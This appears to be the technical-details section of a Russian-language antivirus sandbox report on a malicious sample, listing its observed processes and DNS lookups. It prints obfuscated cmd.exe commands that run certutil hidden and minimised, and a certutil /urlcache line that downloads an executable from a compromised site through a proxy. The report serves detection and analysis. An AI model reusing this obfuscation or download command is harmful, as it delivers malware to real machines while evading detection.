Техническая информация
- '<SYSTEM32>\cmd.exe' /c staRT /B /MIn ^c^E^^^r^^T^^u^^^T^^I^^l /uRLcAchE -sPLiT ...
- 'vi#.#ypothes.is':443
- DNS ASK vi#.#ypothes.is
- DNS ASK st####.rapidssl.com
- '<SYSTEM32>\cmd.exe' /c staRT /B /MIn ^c^E^^^r^^T^^u^^^T^^I^^l /uRLcAchE -sPLiT ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" staRT /B /MIn cE^r^T^u^T^I^l /uRLcAchE -sPLiT /F...
- '<SYSTEM32>\cmd.exe' /starT /B /Min pINg.ExE
- '<SYSTEM32>\certutil.exe' /uRLcAchE -sPLiT /F https://via.hypothes.is/boyama.medyanef.com/vendor/phpunit/phpunit/src/Util/Log/Bc.exe ...